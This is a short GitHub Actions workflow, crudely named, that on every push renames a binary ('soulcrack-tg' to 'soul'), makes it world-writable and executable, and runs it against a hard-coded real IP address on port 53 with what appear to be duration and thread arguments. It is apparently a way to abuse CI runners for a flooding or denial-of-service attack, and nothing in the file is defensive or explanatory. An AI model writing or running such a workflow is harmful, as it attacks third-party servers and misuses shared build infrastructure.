name: soul fucker
on: [push]
jobs:
  stage-0:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Force Run
        run: |
          # Agar soulcrack-tg hai toh use soul banao
          if [ -f "soulcrack-tg" ]; then
            mv soulcrack-tg soul
          fi
          
          # Permission
          chmod 777 soul || echo "File not found"
          
          # Run with a check
          ./soul 147.75.202.61 53 10 100 || echo "Execution failed"
